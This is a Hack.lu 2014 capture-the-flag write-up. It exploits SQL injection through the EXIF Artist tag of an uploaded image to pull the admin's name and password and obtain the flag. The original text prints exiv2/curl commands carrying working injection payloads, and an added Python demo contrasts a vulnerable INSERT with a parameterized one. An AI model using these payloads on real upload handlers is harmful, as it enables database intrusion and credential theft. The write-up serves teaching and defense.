Hack.lu CTF 2014 - ImageUpload (200pts) writeup
The challenge description was: In the Wild Wild Web, there are really bad guys. The sheriff doesn't know them all. Therefore, he needs your help. Upload pictures of criminals to this site and help the sheriff to arrest them. You can make this Wild Wild Web much less wild!!!
After visiting the web page we see the following:
A link to a login form and an image upload form. This page lets us upload a picture to report a wanted person to the sheriff. The details of that person are taken from the image metadata: specifically, the Artist tag is used as the name printed on the picture and in the Author column of the table:
Let's try and see if we can cause a SQL error by adding a quote in the author (artist) field in the image metadata:
mrt:~/hack.lu/imageupload$ exiv2 -M "set Exif.Image.Artist '''" oh.jpg; curl -c cookies.txt -b cookies.txt -F file=@oh.jpg -L https://wildwildweb.fluxfingers.net:1421/upload.php
This upload returned the following error: Error inserting in DB.
This is interesting: if we can cause an error while inserting into the database, we might be able to insert our own data as well.
By looking at the output after successfully uploading a picture, we can assume the query looks like this:
INSERT INTO wanted (width, height, author, manufacturer, model) VALUES ('image width', 'image height', 'value of name', 'value of manufacturer', 'value of model')
Let's try to inject our own values for the Author, Manufacturer and Model columns:
mrt:~/hack.lu/imageupload$ exiv2 -M "set Exif.Image.Artist 1',2,3) -- -" oh.jpg; curl -c cookies.txt -b cookies.txt -F file=@oh.jpg -L https://wildwildweb.fluxfingers.net:1421/upload.php
Great! We can insert our own data, which means we could also insert values already stored in the database, such as the admin's username and password. Normally we would try to list all available tables and columns from information_schema, but that wasn't needed here since the database used common names. After a couple of guessing attempts we found that the table is called users, with usernames stored in the name column and passwords in the password column.
Usually the first row returned is the admin. Instead of inserting a manufacturer and model, we are going to insert the first row returned from the users table, hoping it's the admin; we want the name and password so we can log in with those credentials.
mrt:~/hack.lu/imageupload$ exiv2 -M "set Exif.Image.Artist 0',(SELECT name FROM users LIMIT 1), (SELECT password FROM users LIMIT 1)) -- -" oh.jpg; curl -c cookies.txt -b cookies.txt -F file=@oh.jpg -L https://wildwildweb.fluxfingers.net:1421/upload.php
sheriff : AO7eikkOCucCFJOyyaaQ
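As an added illustration that is not part of the original write-up or the challenge's own code, the Python below reproduces the inferred behaviour of upload.php against an in-memory SQLite database and puts a parameterized INSERT beside it. The schema, the sample users row, and the function names are assumptions; the Artist payloads are the ones from the write-up. The point for a defender: the string-built query accepts the metadata value as SQL, while the parameterized one stores the same value as an inert string, so the quote error, the extra columns, and the subquery leak all disappear.

```python
import sqlite3

# Constructed schema approximating what the write-up infers; the password is a placeholder.
SCHEMA = """
CREATE TABLE wanted (width INTEGER, height INTEGER, author TEXT, manufacturer TEXT, model TEXT);
CREATE TABLE users (name TEXT, password TEXT);
INSERT INTO users VALUES ('sheriff', 'CONSTRUCTED-SAMPLE-PASSWORD');
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def insert_vulnerable(conn, width, height, author, manufacturer, model):
    # Hypothetical reconstruction: the EXIF Artist value is pasted straight into the SQL text,
    # which is what the "Error inserting in DB." response suggests upload.php did.
    sql = ("INSERT INTO wanted (width, height, author, manufacturer, model) VALUES "
           f"('{width}', '{height}', '{author}', '{manufacturer}', '{model}')")
    try:
        conn.execute(sql)
        conn.commit()
        return "ok"
    except sqlite3.Error:
        # Mirrors the generic error the challenge returned on a malformed query.
        return "Error inserting in DB."


def insert_parameterized(conn, width, height, author, manufacturer, model):
    # Hardened form: placeholders bind the metadata as data, never as SQL syntax.
    conn.execute(
        "INSERT INTO wanted (width, height, author, manufacturer, model) VALUES (?, ?, ?, ?, ?)",
        (width, height, author, manufacturer, model),
    )
    conn.commit()
    return "ok"


def last_row(conn):
    return conn.execute(
        "SELECT author, manufacturer, model FROM wanted ORDER BY rowid DESC LIMIT 1"
    ).fetchone()


def demo(inserter, artist):
    """Run one upload with the given Artist tag and report (status, stored author/manufacturer/model)."""
    conn = fresh_db()
    status = inserter(conn, 640, 480, artist, "Canon", "EOS")
    return status, last_row(conn)


QUOTE_PAYLOAD = "'''"
COLUMN_PAYLOAD = "1',2,3) -- -"
LEAK_PAYLOAD = "0',(SELECT name FROM users LIMIT 1), (SELECT password FROM users LIMIT 1)) -- -"

if __name__ == "__main__":
    for payload in (QUOTE_PAYLOAD, COLUMN_PAYLOAD, LEAK_PAYLOAD):
        print("vulnerable   :", demo(insert_vulnerable, payload))
        print("parameterized:", demo(insert_parameterized, payload))
```

Run it and compare the pairs: the vulnerable insert errors on the quote payload, writes attacker-chosen manufacturer and model on the second, and copies the users row into the wanted table on the third, whereas the parameterized insert stores each payload verbatim in the author column with the real manufacturer and model untouched. The same fix applies to any PHP/MySQL handler: bind the EXIF fields with prepared statements instead of interpolating them.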
We can log in as the sheriff if the password is stored in plain text in the database; let's try the login form with these credentials:
You are sucessfully logged in.
Flag: flag{1_5h07_7h3_5h3r1ff}
We got our flag:
flag{1_5h07_7h3_5h3r1ff}